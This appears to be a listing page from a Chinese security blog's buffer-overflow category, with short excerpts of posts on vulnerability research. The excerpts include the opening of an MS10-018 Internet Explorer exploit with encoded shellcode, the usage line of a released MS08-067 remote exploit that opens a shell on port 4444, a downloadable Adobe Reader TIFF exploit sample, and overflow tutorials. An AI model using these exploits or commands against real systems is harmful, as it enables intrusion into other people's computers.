欢迎信息安全界的朋友!黑站、挂马的勿扰!只做基础理论研究。交流IDS、IPS、buffer overflow、内核编程 、sniffer,技术共享!

                                                 
              .                 .    . . .                  
             .                        .        .            
         'BBNNNN                        .  .                
          N                      .       .     .            
         N                         .   .   .                
         N.  .                        .                     
        N  .   .                  .  N   .  NN              
        B   .                       NN.     NN              
       NN                  .  .     BN      NN              
       N .  . .           .      .  ND.     NN              
       N. .                ..  .    NN .    NN              
       N    ..                   .  NB      NN              
       N                 B. .       NN.     NN                    
       N  .               NN        NB .    NN              
       NNNBNNNN            B     .  N.      NN            
       N  .                        .N       NN              
 .     N                 .          N.      NN              
      .N   .            .   .    .  N  .  . BN  ..          
  ..  .B .   .     ..     .       . N       NN     .  .     
       N       NNN.  B.    .  .     N   NNNNNN NNN          
    .. N       N N  N  .NNNB    NNN.B. BN. NBN   B. B.      
      .B .   .   N NN . N N  . NB NBN .N    NN   N  N  .    
     .NN   .    N NN   .  B   .B .  N  N. . B    N.BN.      
  .   N         N N  .    NN   N  ..B. N .  N   .B NN       
      N         NN       NNN   N  NNN  N   NB   NNNN        
  . . B.        BN       NN  .  NNN NN NNNNNN. .NB N  .     
      N         N  . .              . . NN . N.  . N        
   .  N          .                        . .  .  .B   .    
    . D.        .    .      .    .     .      .    N.       
      N          .      .  '    .            .     N  .     
      N          .  .     .       .       .        N  .     
  .             .               .             .   NN .      
                                    . .           N   .     
                                  .        .   .  N .       
                                         .  .     N. ..     
                                    .     .      NN    .    
                                .     . .    NNBNB. '       
                                 . .  BNBNNNNN         .    
                                . .   . . .           .     
                                 .    .      .                                                                                                                

分类: 缓冲区溢出预览模式: 普通 | 列表

MS IE MS10018 Exploit Published

Title : Microsoft Internet Explorer Code Execution Vulnerabilities (MS10-018)
VUPEN ID : VUPEN/ADV-2010-0744
CVE ID : CVE-2010-0267 - CVE-2010-0488 - CVE-2010-0489 - CVE-2010-0490 - CVE-2010-0491 - CVE-2010-0492 - CVE-2010-0494 - CVE-2010-0805 - CVE-2010-0806 - CVE-2010-0807
 

/*ms10018 Exploit*/

<html><body>
<script>
var cn = new Array();
var shellcode = unescape( '%uf946%u41fd%u9f4f%uf83f%u4a4e%ufc9b%u9b27%u9f42%u48f5%u4e9b%u46fc%u994f%u4f9f%ufc4f%u9892%u46fc%u99f5%u463f%u9293%u4afc%u4043%ud693%u9242%ud64f%u9643%u484f%u9743%u27f8%u27d6%u4347%u2791%uf948%u4a91%u9b9f%u37fc%

查看更多...

分类:缓冲区溢出 | 固定链接 | 评论: 6 | 引用: 0 | 查看次数: 19586

Adobe Reader 《=9.3.0 TIFF 漏洞

样本:

下载文件 点击下载此文件

打开后pop up MessageBox

查看更多...

分类:缓冲区溢出 | 固定链接 | 评论: 5 | 引用: 0 | 查看次数: 17639

对付局域网嗅探的人,这个有点意思


如有人在用wireshark嗅探,就播放这个数据


查看更多...

分类:缓冲区溢出 | 固定链接 | 评论: 4 | 引用: 0 | 查看次数: 6538

RPC漏洞的通用分析方法

RPC漏洞的通用分析方法

Friddy 文

一.工具准备

查看更多...

Tags: RPC

分类:缓冲区溢出 | 固定链接 | 评论: 4 | 引用: 0 | 查看次数: 8240

MS08067 For Korea ALL Version

其实这个EXPlOIT一个月前我已经写出来了,远程只要445打开,效果很不错,成功率一直比较高。找我要这个韩文版本的EXPLOIT的人一直比较多,现在补丁应该已经补的差不多了,今天就放出来给大家研究一下。

cmdline:ms08-067kr 192.168.8.21

Then: Telnet  192.168.8.21 4444

查看更多...

分类:缓冲区溢出 | 固定链接 | 评论: 13 | 引用: 0 | 查看次数: 6493

整数溢出

1.0 目录

在这篇文章中我将会讲述2种由于不安全编程引发的问题,导致一些恶意的用户修改受影响的进程
改变程序执行流程.这2种类型的问题都是由于某一程序变量包含一个不可预料的值,因此这种类型
的问题不同于那些程序内存被改写的问题,比如:缓冲区溢出,格式化溢出.所有文章中给出的程序例

查看更多...

分类:缓冲区溢出 | 固定链接 | 评论: 20 | 引用: 0 | 查看次数: 6388

sprintf Stack Overflow Demo

/*Author:friddy QQ:568623*/
#include <stdafx.h>
#include <stdio.h>
#include <string.h>

查看更多...

分类:缓冲区溢出 | 固定链接 | 评论: 3 | 引用: 0 | 查看次数: 5593

Exploit the MS08-021 : Stack Overflow on GDI API

##不提供下载##

刑法第285条规定,违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。

刑法修正案(七)在刑法第285条中增加两款(第二款、第三款):

查看更多...

分类:缓冲区溢出 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 4252